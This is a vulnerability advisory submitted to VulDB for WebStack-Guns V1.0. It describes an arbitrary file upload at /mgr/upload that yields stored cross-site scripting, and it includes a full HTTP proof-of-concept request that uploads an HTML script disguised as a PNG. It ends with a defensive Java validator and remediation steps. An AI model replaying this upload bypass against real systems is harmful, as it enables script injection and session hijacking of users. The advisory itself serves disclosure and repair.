Submit #580744: jsnjfz WebStack-Guns V1.0 Unrestricted Upload

Title: jsnjfz WebStack-Guns V1.0 Unrestricted Upload
Description: An Arbitrary File Upload vulnerability in WebStack-Guns V1.0 leads to Stored Cross-Site Scripting via the `/mgr/upload` endpoint.

# NAME OF AFFECTED PRODUCT(S)
- WebStack-Guns

## Vendor Homepage
https://github.com/jsnjfz/WebStack-Guns

# AFFECTED AND/OR FIXED VERSION(S)

## submitter
- aiyakami, Yveslawtox, luokuang1

## Vulnerable File
- UserMgrController.java

## VERSION(S)
- V1.0

## Software Link
- https://github.com/jsnjfz/WebStack-Guns

# PROBLEM TYPE

## Vulnerability Type
- Arbitrary File Upload → Stored XSS

## Root Cause
- The file upload feature in WebStack-Guns does not validate the extension or the content of the uploaded file (e.g., `.svg` and `.html` are accepted). The separate `name` and `type` form fields can be set to an image name and `image/png` while the actual file part carries an `.html` filename and JavaScript, and the file is stored under that browser-renderable extension. When a victim's browser loads the stored file it executes the script in the application's origin, giving persistent Cross-Site Scripting (XSS).

## Impact
- Attackers can upload malicious files disguised as images which, when rendered by the application or opened by users, execute arbitrary JavaScript in their browsers.

Successful exploitation can lead to:
- Session hijacking (stealing cookies not marked `HttpOnly` via `document.cookie`).
- Phishing attacks (fake login forms injected via XSS).
- Defacement (modifying website content to display false information).
- Malware distribution (redirecting users to malicious sites).

# DESCRIPTION
- During a security review of WebStack-Guns, a critical arbitrary file upload vulnerability was discovered in `UserMgrController.java`. The issue arises from inadequate file validation, allowing attackers to upload malicious files that bypass the intended image-only upload.

# Vulnerability details and POC

## Vulnerability location
- **`UserMgrController.java`** (upload handler mapped at `POST /mgr/upload`)

## Payload
Example: an attacker uploads an HTML file containing `<script>alert(1)</script>`, which executes when the stored file is rendered in a browser. Note that the request below is sent with an authenticated session (`Cookie` header), so the attacker needs an account that can reach `/mgr/upload`; the `name` and `type` fields and the part's `Content-Type` all claim a PNG, while the `filename` and body are HTML.

```
POST /mgr/upload HTTP/1.1
Host: localhost:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt0ZgwC0YZBLSexhj
Referer: http://localhost:8000/site/site_update/1
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
Sec-Fetch-Mode: cors
Cookie: rememberMe=crk7GATbuIjXmQlYi6/e/yL1QoxhQqjKHa4P/HhiuW1VUIjIuh675SKVojnNV3XQ2rFhYG4mLmETBP964jFEznzP2nIwhEpc60WQfVLKbvEdZKZZZEZMUgBd1JM7BJRnHNWhj90J95+0kT5ImNgCKS0NJX5YiflQZyIe4Ib88Le1qTzAtMUyeNMJhnQ0jvO4hSInxTLq1N7xtcCT8F3bukH7obKaIQO/lANiWmogGvNnAdUpcL56On9wmi6rLQYoMw30JYsNgX0NYwA1YXtomAeFgTYARr8CzgBITUrZk3QJnSvaMunOudF7tWVAH2A1y149oAfgn2UdenQ6HAFkJ3he75BaRE17ZILfcRhSOxccB4F8Ykv9nizaxIuvpWHlpB5n3RNR7WPK2jrKSZeXqcqBFqGxWdrKLaDIs7zhewHPXK4SrW8NMp0v57hm90ZgTGpNtWfcFs5huVJxOlWlZ/GkW9UJihBsGjxISIZmZUGerRSpvU4mpOHb9Sc70aJWNS1ElpbalNMUfqae11ajMayf9l1mTLtg8xziS/DflDbbjWN0nPVpDyhJ+rpFqSEmhzIxFsJ5AL3fmNnP0QCwBZo3APgXiD6qqSGgplydAfWERDOgPYoYjTVpw0NZNebWx/wL5bwomJbTxvNupofObIu9wV6NYsiW7m8DoT6kZTj+eqlEndvdntgBZoq8f/x3OLEQ8JaN/Njn9kDXL5fkcIF/JfZ40tqMqo6LdZmZ5EsqmEi2M4jOk3Q4yxk/y8cl4uxBXNBj0fFiWOHlmJixWL+WKNhEZxq8AyQmddQC37N2BI9RWB577R+wSRnkCg2/zaGW+Mamps++zLEBjEY2ECC/R9nD9FEW8wMTOshv5sGpSC9bLGcfYbUnDzbcHTbDiv9bJWxtVnqRYnKlbzC5/X/ePUtkKOtZNd5tOb/Whk79CB+syPxK74rpOF0a4nzcmmgFHYT1rH0GMdBpPHaNljEU7NfYBM1DbCJbDC/qg8qmpEqNlA/RawPcduYnTucl8tgyBwj0dylBHDhxz1mbsxMXDUtsqSfJAvEjSAyuJFCa5kzQzH0w/MFtgc4v/KIXGeO0CqiI77QCxXY=; shiroCookie=ec0f2e61-5be9-4453-9c76-aeeb13df2842
sec-ch-ua-mobile: ?0
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Content-Length: 747

------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="id"

WU_FILE_3
------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="name"

2.png
------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="type"

image/png
------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="lastModifiedDate"

Mon May 19 2025 22:38:28 GMT+0800 (China Standard Time)
------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="size"

25
------WebKitFormBoundaryt0ZgwC0YZBLSexhj
Content-Disposition: form-data; name="file"; filename="2.html"
Content-Type: image/png

<script>alert(1)</script>
------WebKitFormBoundaryt0ZgwC0YZBLSexhj--
```

## Screenshots
The following are screenshots of specific information obtained from testing with the yakit tool (images not reproduced in this submission text).

# Suggested repair
1. **Strict File Extension Whitelisting**: only allow safe extensions (e.g., `.jpg`, `.png`, `.gif`) and reject everything else (e.g., `.svg`, `.html`, `.php`). Derive the extension from the `filename` of the file part after lower-casing it, not from the separate `name`/`type` form fields or the part's `Content-Type`, all of which the client controls, and store the file under a server-generated name rather than the client-supplied one.
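The following is an added example, not code from WebStack-Guns or from the submitter: a stand-alone Java validator that implements the suggested repair (extension allow-list on the file part's `filename`, a signature check on the first bytes of the body, and a server-generated storage name) and runs it against inputs constructed from the PoC above. The class, method and exception names are hypothetical; the byte signatures are the standard PNG/JPEG/GIF file headers.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

// Added example (hypothetical names), not WebStack-Guns code: the check that
// would have rejected the "2.html" part in the PoC request.
public final class SafeImageUpload {

    // Allow-list keyed by extension; each value is the signature the body must start with.
    private static final Map<String, byte[]> ALLOWED = Map.of(
        "png",  new byte[]{(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A},
        "jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "gif",  new byte[]{'G', 'I', 'F', '8'}
    );

    public static final class RejectedUploadException extends Exception {
        RejectedUploadException(String message) { super(message); }
    }

    /** Lower-cased extension of the last path segment of the client-supplied filename, or "" if none. */
    static String extensionOf(String originalFilename) {
        String name = originalFilename.replace('\\', '/');      // drop any path the client smuggled in
        name = name.substring(name.lastIndexOf('/') + 1);
        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) {
            return "";
        }
        return name.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    private static boolean hasSignature(byte[] body, byte[] magic) {
        return body.length >= magic.length
            && Arrays.equals(Arrays.copyOf(body, magic.length), magic);
    }

    /**
     * Returns the server-generated name to store the file under, or throws.
     * The part's declared Content-Type and the separate "name"/"type" form
     * fields are deliberately not consulted: the PoC sets all of them to PNG
     * while uploading HTML, so only the filename extension and the bytes count.
     */
    public static String validate(String originalFilename, byte[] body) throws RejectedUploadException {
        String ext = extensionOf(originalFilename);
        byte[] magic = ALLOWED.get(ext);
        if (magic == null) {
            throw new RejectedUploadException("extension not allowed: \"" + ext + "\"");
        }
        if (!hasSignature(body, magic)) {
            throw new RejectedUploadException("body is not a " + ext + " image");
        }
        // Random name: the client-supplied filename never reaches the filesystem or a URL.
        return UUID.randomUUID() + "." + ext;
    }

    public static void main(String[] args) {
        // Constructed inputs: the PoC's file part, the same body under image names, and a real PNG header.
        byte[] script = "<script>alert(1)</script>".getBytes(StandardCharsets.US_ASCII);
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 0x0D, 'I', 'H', 'D', 'R'};
        String[] names  = {"2.html", "2.png", "../2.svg", "2.PNG"};
        byte[][] bodies = {script,   script,  script,     png};

        for (int i = 0; i < names.length; i++) {
            try {
                System.out.println(names[i] + " -> stored as " + validate(names[i], bodies[i]));
            } catch (RejectedUploadException e) {
                System.out.println(names[i] + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Compile and run with `javac SafeImageUpload.java && java SafeImageUpload`: the first three inputs are rejected (disallowed extension, script body under a `.png` name, path traversal with `.svg`) and only the genuine PNG is accepted under a random name. In a Spring MVC handler such as the one in `UserMgrController.java` this would be called as `validate(picture.getOriginalFilename(), picture.getBytes())` before `transferTo`. As defence in depth, serve the upload directory with `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment`, or from a separate origin, so that a file which does slip through is not rendered as HTML in the application's origin.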
Source: https://github.com/Aiyakami/CVE-1/issues/4
User: aiyakami (UID 85128)
Submission: 05/19/2025 04:51 PM
Moderation: 06/09/2025 08:10 AM (21 days later)
Status: Accepted
VulDB entry: 311658 [jsnjfz WebStack-Guns 1.0 File Upload UserMgrController.java cross site scripting]
Points: 20
